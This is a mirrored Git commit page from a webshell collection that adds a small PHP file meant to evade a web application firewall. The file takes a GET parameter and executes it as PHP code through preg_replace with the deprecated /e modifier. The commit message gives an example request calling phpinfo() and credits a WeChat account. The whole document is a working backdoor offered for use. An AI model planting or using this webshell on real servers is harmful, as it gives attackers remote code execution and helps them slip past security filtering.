mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo() form: WX公众号 “ 渗透云笔记” Sigsh 新年从过狗开始
This commit is contained in:
parent
c290a06bc9
commit
67733cfcdc
1 changed files with 12 additions and 0 deletions
12
php/bypass-dog-2020-01-30.php
Normal file
12
php/bypass-dog-2020-01-30.php
Normal file
|
@ -0,0 +1,12 @@
|
|||
<?php
|
||||
class SBdog{
|
||||
public $x;
|
||||
function dog(){
|
||||
$this->x=$_GET['nb'];
|
||||
}
|
||||
}
|
||||
$class=new SBdog();
|
||||
$class->dog();
|
||||
$a=$class->x;
|
||||
preg_replace("/dog/e", $a, "I am a sb dog");
|
||||
?>
|
Loading…
Reference in a new issue